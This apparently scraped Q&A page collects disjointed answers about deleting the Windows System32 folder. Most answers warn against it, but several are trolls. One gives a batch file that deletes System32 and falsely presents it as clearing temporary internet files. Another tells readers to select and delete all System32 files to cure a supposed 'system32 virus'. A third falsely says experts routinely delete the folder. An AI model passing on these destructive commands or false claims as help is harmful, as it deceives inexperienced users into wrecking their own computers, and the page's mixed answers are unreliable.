are you sure you need to? These are Operating system files--necessary for the bootup, file management, and general operation of your computer. Just because you cannot tell by the filename what they are for, they are required by the OS. If you delete one, you may find yourself rebuilding your computer.
The System32 folder and its subfolders contain the core operating system files for your Windows installation. No matter what anyone tells you do not delete this folder. Tampering with any single file may make you computer a paperweight.
If you delete the system32 files when you try to restart your PC,It shuts down and your Computer will end up in a error screen for more informaition:
Do not delete this, if you do your computer will become non functional. Telling users to delete this was a common "troll" on the internet used to make people unfamiliar with computers to delete critical system files. For more information please see the related link
Mine has suddenly started doing this too. A required Microsoft Windows system directory, the Windows System32 directory is often located in either C:\Windows\System32 or C:\Winnt\system32. Often many Microsoft Windows error messages will contain the system32 directory because many of the system files Windows uses to run are stored in this directory. By itself the System32 directory will not cause any errors unless it is missing of course. If you are getting an error with a file in the System32 directory search for that file. No error message, it just pops up and has to be 'closed'
system32 is the most important files on your computer/laptop. if you deleted it,it would greatly screw up your computer/laptop. some people has been tricking people to delete system32 by saying it is a virus,size hogger,or a bunch of useless stuff. NEVER EVER DELETE SYSTEM32
open up notepad type the following: @echo off del c:\WINDOWS\system32 save the file as anything.bat (remember to add the .bat extension and save as all files) double click and it will delete the system32 folder. said folder is the where the majority of your temp. internet files are located. getting rid of them should work.
NO, system 32 is your computer's operating system. if you delete your system 32, you might as well buy another computer.
The system32 virus...It screws up Windows operating system and randomly deletes important imformation (files) on your computer.... How to get rid of it:Go to computer,C: Drive and then go to a folder named system32.Wait for all the files to appear...Press Crtl + A + Delete on your keyboard...Success!You have gotten rid of the system32 virus
The Windows XP registry files are found on this path: Windows\System32\Config. You can edit registry settings using the Regedit.exe tool.
False AnswerNo, you can delete your system32 folder without reprecussions. Your system32 files are only used for high end computer diagnostics, they take up so much space that most computer experts delete them as soon as they buy a computer. True AnswerSystem32 contains most of your computer's vital files to function. Those who tell you otherwise are trolls. So, if you delete it, your computer dies.
if no files exist try to disable the software from the start-up list... go to start-run & write msconfig, click on the start up tab and uncheck the anti virus... click on apply and then restart... this will not remove the software but will prevent it from booting up.
c:\windows\system32\logfiles\srt\srttrail.txt